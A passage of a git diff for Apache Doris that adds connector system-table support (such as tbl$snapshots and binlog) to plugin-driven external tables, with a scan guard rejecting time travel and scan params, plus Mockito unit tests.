snapshotExists; + } + @Override public void close() { log.add("close"); diff --git a/fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenExternalTable.java b/fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenExternalTable.java index 85facd276e1d24..3fbe42d9c9911d 100644 --- a/fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenExternalTable.java +++ b/fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenExternalTable.java @@ -33,6 +33,8 @@ import org.apache.doris.connector.api.ConnectorTableStatistics; import org.apache.doris.connector.api.handle.ConnectorTableHandle; import org.apache.doris.datasource.mvcc.MvccSnapshot; +import org.apache.doris.datasource.systable.PluginDrivenSysTable; +import org.apache.doris.datasource.systable.SysTable; import org.apache.doris.statistics.AnalysisInfo; import org.apache.doris.statistics.BaseAnalysisTask; import org.apache.doris.statistics.ExternalAnalysisTask; @@ -72,6 +74,18 @@ public PluginDrivenExternalTable(long id, String name, String remoteName, super(id, name, remoteName, catalog, db, TableType.PLUGIN_EXTERNAL_TABLE); } + /** + * Single seam for acquiring this table's {@link ConnectorTableHandle}. The base class resolves + * the handle for its own remote name; {@link PluginDrivenSysExternalTable} overrides this to + * thread a system-table handle through {@code initSchema}/{@code getNameToPartitionItems}/ + * {@code fetchRowCount} without duplicating the metadata round-trip in each site. + */ + protected Optional resolveConnectorTableHandle( + ConnectorSession session, ConnectorMetadata metadata) { + String dbName = db != null ? db.getRemoteName() : ""; + return metadata.getTableHandle(session, dbName, getRemoteName()); + } + /** * Returns whether the underlying connector supports multiple concurrent writers. * Used by the planner to decide GATHER (single writer) vs parallel distribution. @@ -148,7 +162,7 @@ public Optional initSchema() { String dbName = db != null ? db.getRemoteName() : ""; String tableName = getRemoteName(); - Optional handleOpt = metadata.getTableHandle(session, dbName, tableName); + Optional handleOpt = resolveConnectorTableHandle(session, metadata); if (!handleOpt.isPresent()) { LOG.warn("Table handle not found for plugin-driven table: {}.{}", dbName, tableName); return Optional.empty(); @@ -257,8 +271,7 @@ public Map getNameToPartitionItems(Optional Connector connector = pluginCatalog.getConnector(); ConnectorSession session = pluginCatalog.buildConnectorSession(); ConnectorMetadata metadata = connector.getMetadata(session); - String dbName = db != null ? db.getRemoteName() : ""; - Optional handleOpt = metadata.getTableHandle(session, dbName, getRemoteName()); + Optional handleOpt = resolveConnectorTableHandle(session, metadata); if (!handleOpt.isPresent()) { return Collections.emptyMap(); } @@ -332,6 +345,42 @@ public String getComment(boolean escapeQuota) { } } + /** + * Exposes the connector's system tables (e.g. {@code tbl$snapshots}) through the live fe-core + * system-table machinery. Delegates name discovery to the connector SPI + * ({@link ConnectorMetadata#listSupportedSysTables}); each returned bare name (already lowercase) + * is wrapped in a {@link PluginDrivenSysTable} so {@link org.apache.doris.catalog.TableIf#findSysTable} + * resolves {@code tbl$name} and {@link org.apache.doris.datasource.systable.SysTableResolver} can + * build the transient sys ExternalTable. Mirrors the legacy no-cache getTableHandle pattern: the + * handle/name list is fetched per call (system-table planning is infrequent), so no extra caching. + */ + @Override + public Map getSupportedSysTables() { + if (!(catalog instanceof PluginDrivenExternalCatalog)) { + return Collections.emptyMap(); + } + makeSureInitialized(); + PluginDrivenExternalCatalog pluginCatalog = (PluginDrivenExternalCatalog) catalog; + Connector connector = pluginCatalog.getConnector(); + ConnectorSession session = pluginCatalog.buildConnectorSession(); + ConnectorMetadata metadata = connector.getMetadata(session); + Optional handleOpt = resolveConnectorTableHandle(session, metadata); + if (!handleOpt.isPresent()) { + return Collections.emptyMap(); + } + List names = metadata.listSupportedSysTables(session, handleOpt.get()); + if (names.isEmpty()) { + return Collections.emptyMap(); + } + // Keep keys exactly as returned by the connector (already lowercase) so the inherited, + // case-sensitive findSysTable exact-match works, mirroring legacy PaimonSysTable keys. + Map result = Maps.newHashMapWithExpectedSize(names.size()); + for (String sysName : names) { + result.put(sysName, new PluginDrivenSysTable(sysName)); + } + return Collections.unmodifiableMap(result); + } + @Override public void gsonPostProcess() throws IOException { super.gsonPostProcess(); @@ -357,9 +406,7 @@ public long fetchRowCount() { ConnectorSession session = pluginCatalog.buildConnectorSession(); ConnectorMetadata metadata = connector.getMetadata(session); - String dbName = db != null ? db.getRemoteName() : ""; - String tableName = getRemoteName(); - Optional handleOpt = metadata.getTableHandle(session, dbName, tableName); + Optional handleOpt = resolveConnectorTableHandle(session, metadata); if (!handleOpt.isPresent()) { return UNKNOWN_ROW_COUNT; } diff --git a/fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenScanNode.java b/fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenScanNode.java index 41315afe87fabb..bfb77a055ca628 100644 --- a/fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenScanNode.java +++ b/fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenScanNode.java @@ -143,10 +143,14 @@ public static PluginDrivenScanNode create(PlanNodeId id, TupleDescriptor desc, ConnectorSession session = catalog.buildConnectorSession(); ConnectorMetadata metadata = connector.getMetadata(session); String dbName = table.getDb() != null ? table.getDb().getRemoteName() : ""; - String tableName = table.getRemoteName(); - ConnectorTableHandle handle = metadata.getTableHandle(session, dbName, tableName) + // Resolve through the table's sys-aware seam (NOT raw metadata.getTableHandle): for a normal + // table this is identical to getTableHandle(session, dbName, remoteName), but for a + // PluginDrivenSysExternalTable the override returns the connector's SYSTEM handle (carrying + // sysTableName + forceJni), so the scan path threads force-JNI correctly for binlog/audit_log. + ConnectorTableHandle handle = table.resolveConnectorTableHandle(session, metadata) .orElseThrow(() -> new RuntimeException( - "Table handle not found for plugin-driven table: " + dbName + "." + tableName)); + "Table handle not found for plugin-driven table: " + dbName + "." + + table.getRemoteName())); return new PluginDrivenScanNode(id, desc, needCheckColumnPriv, sv, scanContext, connector, session, handle); } @@ -430,8 +434,34 @@ private void tryPushDownProjection(List columns) { } } + /** + * Fail-loud guard for plugin system-table scans: a {@link PluginDrivenSysExternalTable} must + * reject {@code FOR TIME AS OF} (snapshot) and {@code @incr}/scan-params queries rather than + * silently ignore them. Mirrors legacy {@code PaimonScanNode.getProcessedTable}, which throws the + * same two messages when the target is a {@code PaimonSysExternalTable}. Runs before split + * generation on BOTH planning entry points ({@link #getSplits}, {@link #startSplit}). + * + *

    Scope: SYS-table only. Normal-plugin-table time-travel handling is B5/MVCC and is out of + * scope here. + * + *

    Package-private (not private) so the guard can be unit-tested directly on a Mockito mock + * with the three accessors stubbed, without constructing a full {@link FileQueryScanNode}. + */ + void checkSysTableScanConstraints() throws UserException { + if (!(getTargetTable() instanceof PluginDrivenSysExternalTable)) { + return; + } + if (getScanParams() != null) { + throw new UserException("Plugin system tables do not support scan params."); + } + if (getQueryTableSnapshot() != null) { + throw new UserException("Plugin system tables do not support time travel."); + } + } + @Override public List getSplits(int numBackends) throws UserException { + checkSysTableScanConstraints(); // Attempt limit and projection pushdown via SPI protocol tryPushDownLimit(); @@ -571,6 +601,15 @@ public int numApproximateSplits() { */ @Override public void startSplit(int numBackends) { + try { + checkSysTableScanConstraints(); + } catch (UserException e) { + // startSplit cannot throw checked exceptions; surface the fail-loud guard through the + // SplitAssignment error channel (same protocol the async batch path below uses) so the + // query fails rather than silently ignoring scan-params/time-travel on a sys table. + splitAssignment.setException(e); + return; + } long[] partitionCounts = displayPartitionCounts(selectedPartitions); if (partitionCounts != null) { this.selectedPartitionNum = partitionCounts[0]; diff --git a/fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenSysExternalTable.java b/fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenSysExternalTable.java new file mode 100644 index 00000000000000..16afbe45d8750e --- /dev/null +++ b/fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenSysExternalTable.java @@ -0,0 +1,108 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.datasource; + +import org.apache.doris.connector.api.ConnectorMetadata; +import org.apache.doris.connector.api.ConnectorSession; +import org.apache.doris.connector.api.handle.ConnectorTableHandle; +import org.apache.doris.datasource.systable.SysTable; + +import java.util.Map; +import java.util.Optional; + +/** + * Generic {@link PluginDrivenExternalTable} for a connector system table (e.g. {@code tbl$snapshots}). + * + *

    Created transiently by {@link org.apache.doris.datasource.systable.PluginDrivenSysTable} during + * planning/describe (via {@code createSysExternalTable}); it is NEVER added to a persisted table map + * and is NOT GSON-registered, mirroring legacy sys ExternalTables (e.g. + * {@link org.apache.doris.datasource.paimon.PaimonSysExternalTable}).

    + * + *

    It reports {@link org.apache.doris.catalog.TableIf.TableType#PLUGIN_EXTERNAL_TABLE} (inherited); + * no connector-specific table type is introduced. The whole schema/partition/row-count path is reused + * from the base class; the only behavioral change is {@link #resolveConnectorTableHandle}, which threads + * the connector's system-table handle (not the base handle) through every base-class site.

    + */ +public class PluginDrivenSysExternalTable extends PluginDrivenExternalTable { + + private final PluginDrivenExternalTable sourceTable; + private final String sysTableName; + + /** + * @param source the underlying base table being wrapped + * @param sysName the bare system-table name (e.g. "snapshots"), no "$" prefix + */ + public PluginDrivenSysExternalTable(PluginDrivenExternalTable source, String sysName) { + super(generateSysTableId(source.getId(), sysName), + source.getName() + "$" + sysName, + source.getRemoteName() + "$" + sysName, + source.getCatalog(), + source.getDb()); + this.sourceTable = source; + this.sysTableName = sysName; + } + + /** + * Generate a unique ID from the source table ID and system table name (legacy parity with + * {@code PaimonSysExternalTable.generateSysTableId}). + */ + private static long generateSysTableId(long sourceTableId, String sysName) { + return sourceTableId ^ (sysName.hashCode() * 31L); + } + + /** + * Resolve the connector handle for THIS system table: first acquire the BASE table handle using the + * source's remote name (NOT this sys table's "$"-suffixed remote name), then ask the connector for + * the system-table handle. Returning the sys handle here threads it through + * {@code initSchema}/{@code getNameToPartitionItems}/{@code fetchRowCount} automatically, so a sys + * query reads the sys table rather than the base. + */ + @Override + protected Optional resolveConnectorTableHandle( + ConnectorSession session, ConnectorMetadata metadata) { + String dbName = db != null ? db.getRemoteName() : ""; + Optional baseHandle = + metadata.getTableHandle(session, dbName, sourceTable.getRemoteName()); + if (!baseHandle.isPresent()) { + return Optional.empty(); + } + return metadata.getSysTableHandle(session, baseHandle.get(), sysTableName); + } + + /** + * Delegate to the source table so DESCRIBE/SHOW on a system table still lists its sibling system + * tables (legacy parity with {@code PaimonSysExternalTable.getSupportedSysTables}). + */ + @Override + public Map getSupportedSysTables() { + return sourceTable.getSupportedSysTables(); + } + + @Override + public String getComment() { + return "Plugin system table: " + sysTableName + " for " + sourceTable.getName(); + } + + public PluginDrivenExternalTable getSourceTable() { + return sourceTable; + } + + public String getSysTableName() { + return sysTableName; + } +} diff --git a/fe/fe-core/src/main/java/org/apache/doris/datasource/systable/PluginDrivenSysTable.java b/fe/fe-core/src/main/java/org/apache/doris/datasource/systable/PluginDrivenSysTable.java new file mode 100644 index 00000000000000..445184c37254aa --- /dev/null +++ b/fe/fe-core/src/main/java/org/apache/doris/datasource/systable/PluginDrivenSysTable.java @@ -0,0 +1,46 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.datasource.systable; + +import org.apache.doris.datasource.ExternalTable; +import org.apache.doris.datasource.PluginDrivenExternalTable; +import org.apache.doris.datasource.PluginDrivenSysExternalTable; + +/** + * Generic {@link NativeSysTable} for plugin-driven connectors. + * + *

    Unlike {@link PaimonSysTable} (which enumerates a fixed connector-specific set), instances of this + * class are created on demand by {@link PluginDrivenExternalTable#getSupportedSysTables()} from the + * names the connector SPI reports. {@link #createSysExternalTable(ExternalTable)} builds the transient + * {@link PluginDrivenSysExternalTable} that the planner executes through the native table path.

    + */ +public class PluginDrivenSysTable extends NativeSysTable { + + public PluginDrivenSysTable(String sysName) { + super(sysName); + } + + @Override + public ExternalTable createSysExternalTable(ExternalTable sourceTable) { + if (!(sourceTable instanceof PluginDrivenExternalTable)) { + throw new IllegalArgumentException( + "Expected PluginDrivenExternalTable but got " + sourceTable.getClass().getSimpleName()); + } + return new PluginDrivenSysExternalTable((PluginDrivenExternalTable) sourceTable, getSysTableName()); + } +} diff --git a/fe/fe-core/src/test/java/org/apache/doris/datasource/PluginDrivenScanNodeSysHandleTest.java b/fe/fe-core/src/test/java/org/apache/doris/datasource/PluginDrivenScanNodeSysHandleTest.java new file mode 100644 index 00000000000000..2ac3bcd7ae81d1 --- /dev/null +++ b/fe/fe-core/src/test/java/org/apache/doris/datasource/PluginDrivenScanNodeSysHandleTest.java @@ -0,0 +1,217 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.datasource; + +import org.apache.doris.analysis.TupleDescriptor; +import org.apache.doris.analysis.TupleId; +import org.apache.doris.common.jmockit.Deencapsulation; +import org.apache.doris.connector.api.Connector; +import org.apache.doris.connector.api.ConnectorMetadata; +import org.apache.doris.connector.api.ConnectorSession; +import org.apache.doris.connector.api.handle.ConnectorTableHandle; +import org.apache.doris.planner.PlanNodeId; +import org.apache.doris.planner.ScanContext; +import org.apache.doris.qe.SessionVariable; + +import org.junit.jupiter.api.Assertions; +import org.junit.jupiter.api.Test; +import org.mockito.Mockito; + +import java.util.Collections; +import java.util.HashMap; +import java.util.List; +import java.util.Map; +import java.util.Optional; + +/** + * Guards the SCAN-PATH handle resolution in {@link PluginDrivenScanNode#create} (B4 final-review BLOCKER). + * + *

    Why this matters: for a connector system table ({@link PluginDrivenSysExternalTable}, + * e.g. {@code tbl$binlog}), the scan node must thread the connector's SYSTEM-table handle — the one + * carrying {@code sysTableName}/{@code forceJni} — not a plain handle for the base table. If + * {@code create} resolved the handle with a RAW {@code metadata.getTableHandle(...)} (the base-table + * handle), the connector's force-JNI flag never reaches the scan plan, so a binlog/audit_log split + * whose native conversion succeeds would take the NATIVE reader instead of JNI and return silently + * wrong rows. {@code create} must go through the sys-aware seam + * {@link PluginDrivenExternalTable#resolveConnectorTableHandle} so the override on the sys table feeds + * the system handle through.

    + * + *

    This drives the REAL static {@code create(...)} end-to-end (full {@code FileQueryScanNode} + * constructor chain — same construction used by {@code IcebergScanNodeTest}) over a real sys table, + * then reads back the node's resolved {@code currentHandle} and asserts it is the SYS handle (distinct + * mock), not the base handle. fe-core has no paimon on its classpath, so the connector-specific + * {@code PaimonTableHandle.isForceJni()} cannot be referenced here; asserting "the sys handle, not the + * base handle, was threaded" is the in-module proxy for "force-JNI is preserved on the scan path".

    + */ +public class PluginDrivenScanNodeSysHandleTest { + + @Test + public void createThreadsSysHandleNotBaseHandleForSysTable() { + ConnectorMetadata metadata = Mockito.mock(ConnectorMetadata.class); + ConnectorSession session = Mockito.mock(ConnectorSession.class); + // Two DISTINCT handles: a base-table handle and the connector's system-table handle. + // The base handle stands in for the NORMAL PaimonTableHandle (forceJni=false) that raw + // getTableHandle would yield; the sys handle stands in for the force-JNI sys handle. + ConnectorTableHandle baseHandle = Mockito.mock(ConnectorTableHandle.class); + ConnectorTableHandle sysHandle = Mockito.mock(ConnectorTableHandle.class); + + TestablePluginCatalog catalog = new TestablePluginCatalog("paimon", metadata, session); + ExternalDatabase db = mockDb("REMOTE_DB"); + + // Base handle resolved from the SOURCE remote name (not the "$"-suffixed sys remote name); + // the connector then maps base handle + "binlog" -> the sys handle. NOTE: there is no stub + // for getTableHandle on the "$"-suffixed sys remote name, so a raw resolution in create() + // would return the unstubbed (default) value, never sysHandle. + Mockito.when(metadata.getTableHandle(session, "REMOTE_DB", "REMOTE_TBL")) + .thenReturn(Optional.of(baseHandle)); + Mockito.when(metadata.getSysTableHandle(session, baseHandle, "binlog")) + .thenReturn(Optional.of(sysHandle)); + + PluginDrivenExternalTable base = bareTable(catalog, db, "REMOTE_TBL"); + PluginDrivenSysExternalTable sysTable = new PluginDrivenSysExternalTable(base, "binlog") { + @Override + protected synchronized void makeSureInitialized() { + // no-op: skip Env-backed catalog/db init + } + }; + + PluginDrivenScanNode node = PluginDrivenScanNode.create(new PlanNodeId(0), + new TupleDescriptor(new TupleId(0)), false, new SessionVariable(), + ScanContext.EMPTY, catalog, sysTable); + + ConnectorTableHandle resolved = Deencapsulation.getField(node, "currentHandle"); + // WHY: a system-table scan must thread the connector's SYS handle (force-JNI) so binlog/ + // audit_log go through JNI, not the native reader. The sys table's resolveConnectorTableHandle + // override returns the sys handle; create() MUST honor that seam. + // MUTATION: reverting create() to raw metadata.getTableHandle(session, dbName, + // table.getRemoteName()) resolves "REMOTE_TBL$binlog" (unstubbed -> not sysHandle, and + // never calls getSysTableHandle) -> resolved != sysHandle -> red. + Assertions.assertSame(sysHandle, resolved, + "scan node must resolve the connector SYS handle (force-JNI) via the sys-aware seam, " + + "not a raw base-table handle"); + Assertions.assertNotSame(baseHandle, resolved, + "scan node must NOT use the base-table handle for a system table"); + Mockito.verify(metadata).getSysTableHandle(session, baseHandle, "binlog"); + } + + @Test + public void createUsesBaseHandleForNormalTableUnchanged() { + // Normal (non-sys) plugin table: base resolveConnectorTableHandle == old inline call, so the + // resolved handle is exactly metadata.getTableHandle(session, db, remoteName). Pins that the + // fix is behavior-preserving for normal tables (max_compute/jdbc/etc.). + ConnectorMetadata metadata = Mockito.mock(ConnectorMetadata.class); + ConnectorSession session = Mockito.mock(ConnectorSession.class); + ConnectorTableHandle baseHandle = Mockito.mock(ConnectorTableHandle.class); + + TestablePluginCatalog catalog = new TestablePluginCatalog("paimon", metadata, session); + ExternalDatabase db = mockDb("REMOTE_DB"); + Mockito.when(metadata.getTableHandle(session, "REMOTE_DB", "REMOTE_TBL")) + .thenReturn(Optional.of(baseHandle)); + + PluginDrivenExternalTable table = bareTable(catalog, db, "REMOTE_TBL"); + + PluginDrivenScanNode node = PluginDrivenScanNode.create(new PlanNodeId(0), + new TupleDescriptor(new TupleId(0)), false, new SessionVariable(), + ScanContext.EMPTY, catalog, table); + + ConnectorTableHandle resolved = Deencapsulation.getField(node, "currentHandle"); + // WHY: for a normal table the sys-aware seam's base impl is identical to the old inline + // getTableHandle, so the resolved handle must still be the plain base handle and the sys + // path must never be consulted. MUTATION: a create() that always wrapped/forced a sys + // handle would break normal tables -> this would no longer be baseHandle. + Assertions.assertSame(baseHandle, resolved, + "normal plugin table must resolve the plain base-table handle (behavior unchanged)"); + Mockito.verify(metadata, Mockito.never()) + .getSysTableHandle(Mockito.any(), Mockito.any(), Mockito.anyString()); + } + + // ==================== helpers (mirror PluginDrivenSysTableTest) ==================== + + private static PluginDrivenExternalTable bareTable(PluginDrivenExternalCatalog catalog, + ExternalDatabase db, String remoteName) { + return new PluginDrivenExternalTable(1L, "tbl", remoteName, catalog, db) { + @Override + protected synchronized void makeSureInitialized() { + // no-op: skip Env-backed catalog/db init + } + }; + } + + @SuppressWarnings("unchecked") + private static ExternalDatabase mockDb(String remoteName) { + ExternalDatabase db = Mockito.mock(ExternalDatabase.class); + Mockito.when(db.getRemoteName()).thenReturn(remoteName); + return db; + } + + /** + * Minimal {@link PluginDrivenExternalCatalog} returning a fixed connector/session without standing + * up the Doris environment (mirrors {@code PluginDrivenSysTableTest.TestablePluginCatalog}). + */ + private static class TestablePluginCatalog extends PluginDrivenExternalCatalog { + private final Connector connector; + private final ConnectorSession session; + + TestablePluginCatalog(String catalogType, ConnectorMetadata metadata, ConnectorSession session) { + this(catalogType, mockConnector(metadata, session), session); + } + + private TestablePluginCatalog(String catalogType, Connector connector, ConnectorSession session) { + super(1L, "test-catalog", null, makeProps(catalogType), "", connector); + this.connector = connector; + this.session = session; + } + + private static Connector mockConnector(ConnectorMetadata metadata, ConnectorSession session) { + Connector c = Mockito.mock(Connector.class); + Mockito.when(c.getMetadata(session)).thenReturn(metadata); + return c; + } + + @Override + public Connector getConnector() { + return connector; + } + + @Override + public ConnectorSession buildConnectorSession() { + return session; + } + + @Override + protected List listDatabaseNames() { + return Collections.emptyList(); + } + + @Override + protected List listTableNamesFromRemote(SessionContext ctx, String dbName) { + return Collections.emptyList(); + } + + @Override + public boolean tableExist(SessionContext ctx, String dbName, String tblName) { + return false; + } + + private static Map makeProps(String type) { + Map props = new HashMap<>(); + props.put("type", type); + return props; + } + } +} diff --git a/fe/fe-core/src/test/java/org/apache/doris/datasource/PluginDrivenScanNodeSysTableGuardTest.java b/fe/fe-core/src/test/java/org/apache/doris/datasource/PluginDrivenScanNodeSysTableGuardTest.java new file mode 100644 index 00000000000000..52bef28b3d8656 --- /dev/null +++ b/fe/fe-core/src/test/java/org/apache/doris/datasource/PluginDrivenScanNodeSysTableGuardTest.java @@ -0,0 +1,106 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.datasource; + +import org.apache.doris.analysis.TableScanParams; +import org.apache.doris.analysis.TableSnapshot; +import org.apache.doris.catalog.TableIf; +import org.apache.doris.common.UserException; + +import org.junit.jupiter.api.Assertions; +import org.junit.jupiter.api.Test; +import org.mockito.Mockito; + +/** + * Guards the fail-loud sys-table scan-constraint check in + * {@link PluginDrivenScanNode#checkSysTableScanConstraints()} (P5-T19 Part C). + * + *

    WHY this matters: a {@code FOR TIME AS OF} (snapshot) or {@code @incr}/scan-params query against + * a plugin system table ({@link PluginDrivenSysExternalTable}) has no defined semantics — the + * sys table is a synthetic view, not a versioned data table. Legacy + * {@code PaimonScanNode.getProcessedTable} throws for exactly this case. Without the guard the + * scan-params / snapshot would be silently dropped and the query would return the plain sys-table + * contents, masking a user error. These tests pin that the guard fails loud (Rule 12).

    + * + *

    Driven on a Mockito mock with {@code CALLS_REAL_METHODS} (no constructor — building a full + * {@link FileQueryScanNode} needs a harness this module lacks) and the three accessors + * ({@code getTargetTable}, {@code getScanParams}, {@code getQueryTableSnapshot}) stubbed, so the real + * guard runs against controlled state. The guard is package-private exactly to enable this.

    + */ +public class PluginDrivenScanNodeSysTableGuardTest { + + private static PluginDrivenScanNode guardOnlyNode() throws Exception { + PluginDrivenScanNode node = Mockito.mock(PluginDrivenScanNode.class, Mockito.CALLS_REAL_METHODS); + // Default: no scan-params, no snapshot. Tests override per-case. + Mockito.doReturn(null).when(node).getScanParams(); + Mockito.doReturn(null).when(node).getQueryTableSnapshot(); + return node; + } + + @Test + public void sysTableRejectsScanParams() throws Exception { + PluginDrivenScanNode node = guardOnlyNode(); + Mockito.doReturn(Mockito.mock(PluginDrivenSysExternalTable.class)).when(node).getTargetTable(); + Mockito.doReturn(Mockito.mock(TableScanParams.class)).when(node).getScanParams(); + + // WHY: an @incr / scan-params query on a sys table must fail loud, not silently ignore the + // params. MUTATION: removing the getScanParams() throw in the guard -> no exception -> red. + UserException ex = Assertions.assertThrows(UserException.class, + node::checkSysTableScanConstraints); + Assertions.assertTrue(ex.getMessage().contains("scan params"), + "scan-params rejection must carry the expected message, got: " + ex.getMessage()); + } + + @Test + public void sysTableRejectsTimeTravel() throws Exception { + PluginDrivenScanNode node = guardOnlyNode(); + Mockito.doReturn(Mockito.mock(PluginDrivenSysExternalTable.class)).when(node).getTargetTable(); + Mockito.doReturn(Mockito.mock(TableSnapshot.class)).when(node).getQueryTableSnapshot(); + + // WHY: a FOR TIME AS OF query on a sys table must fail loud. MUTATION: removing the + // getQueryTableSnapshot() throw in the guard -> no exception -> red. + UserException ex = Assertions.assertThrows(UserException.class, + node::checkSysTableScanConstraints); + Assertions.assertTrue(ex.getMessage().contains("time travel"), + "time-travel rejection must carry the expected message, got: " + ex.getMessage()); + } + + @Test + public void sysTableWithoutScanParamsOrSnapshotDoesNotThrow() throws Exception { + PluginDrivenScanNode node = guardOnlyNode(); + Mockito.doReturn(Mockito.mock(PluginDrivenSysExternalTable.class)).when(node).getTargetTable(); + + // WHY: a plain sys-table scan (no params, no snapshot) is valid and must pass the guard. + // This pins that the guard only rejects the two unsupported features, not all sys scans. + Assertions.assertDoesNotThrow(node::checkSysTableScanConstraints); + } + + @Test + public void normalTableWithScanParamsDoesNotThrowFromGuard() throws Exception { + PluginDrivenScanNode node = guardOnlyNode(); + // A NON-sys plugin table: even with scan-params/snapshot set, this guard is a no-op + // (normal-table time-travel is B5/MVCC, out of scope here). + Mockito.doReturn(Mockito.mock(TableIf.class)).when(node).getTargetTable(); + Mockito.doReturn(Mockito.mock(TableScanParams.class)).when(node).getScanParams(); + Mockito.doReturn(Mockito.mock(TableSnapshot.class)).when(node).getQueryTableSnapshot(); + + // WHY: the guard is SYS-table only. MUTATION: widening the instanceof check to all tables + // would throw here -> red. Pins the scope limit. + Assertions.assertDoesNotThrow(node::checkSysTableScanConstraints); + } +} diff --git a/fe/fe-core/src/test/java/org/apache/doris/datasource/PluginDrivenSysTableTest.java b/fe/fe-core/src/test/java/org/apache/doris/datasource/PluginDrivenSysTableTest.java new file mode 100644 index 00000000000000..b213d66eec800b --- /dev/null +++ b/fe/fe-core/src/test/java/org/apache/doris/datasource/PluginDrivenSysTableTest.java @@ -0,0 +1,304 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.datasource; + +import org.apache.doris.catalog.TableIf.TableType; +import org.apache.doris.connector.api.Connector; +import org.apache.doris.connector.api.ConnectorColumn; +import org.apache.doris.connector.api.ConnectorMetadata; +import org.apache.doris.connector.api.ConnectorSession; +import org.apache.doris.connector.api.ConnectorTableSchema; +import org.apache.doris.connector.api.ConnectorType; +import org.apache.doris.connector.api.handle.ConnectorTableHandle; +import org.apache.doris.datasource.systable.PluginDrivenSysTable; +import org.apache.doris.datasource.systable.SysTable; + +import org.junit.jupiter.api.Assertions; +import org.junit.jupiter.api.Test; +import org.mockito.Mockito; + +import java.util.Arrays; +import java.util.Collections; +import java.util.HashMap; +import java.util.List; +import java.util.Map; +import java.util.Optional; + +/** + * Tests for the generic plugin-driven system-table machinery (T18): {@link PluginDrivenSysTable}, + * {@link PluginDrivenSysExternalTable}, and {@link PluginDrivenExternalTable#getSupportedSysTables()}. + * + *

    Why this matters: plugin-driven external tables must expose connector system tables + * (e.g. {@code cat.db.tbl$snapshots}) by REUSING the live fe-core system-table machinery + * ({@code TableIf.findSysTable} + {@code NativeSysTable.createSysExternalTable} + + * {@code SysTableResolver}), delegating the connector-specific bits (which sys tables exist, how to + * obtain a sys handle) to the SPI. The discovery must be GENERIC (driven by the connector SPI, not + * hardcoded per connector) and a system-table query must read the SYSTEM table, not the base table.

    + */ +public class PluginDrivenSysTableTest { + + // ==================== getSupportedSysTables() delegates to the connector SPI ==================== + + @Test + public void testGetSupportedSysTablesDelegatesToConnector() { + ConnectorMetadata metadata = Mockito.mock(ConnectorMetadata.class); + ConnectorSession session = Mockito.mock(ConnectorSession.class); + ConnectorTableHandle baseHandle = Mockito.mock(ConnectorTableHandle.class); + TestablePluginCatalog catalog = new TestablePluginCatalog("paimon", metadata, session); + ExternalDatabase db = mockDb("REMOTE_DB"); + Mockito.when(metadata.getTableHandle(session, "REMOTE_DB", "REMOTE_TBL")) + .thenReturn(Optional.of(baseHandle)); + Mockito.when(metadata.listSupportedSysTables(session, baseHandle)) + .thenReturn(Arrays.asList("snapshots", "binlog")); + + PluginDrivenExternalTable table = bareTable(catalog, db, "REMOTE_TBL"); + Map sysTables = table.getSupportedSysTables(); + + // WHY: discovery must come from the connector SPI (listSupportedSysTables), keyed by the + // bare name so the inherited findSysTable exact-match resolves. MUTATION: returning + // Collections.emptyMap() (ignoring the SPI) makes both keys absent -> red. + Assertions.assertEquals(2, sysTables.size()); + Assertions.assertTrue(sysTables.containsKey("snapshots"), "must expose 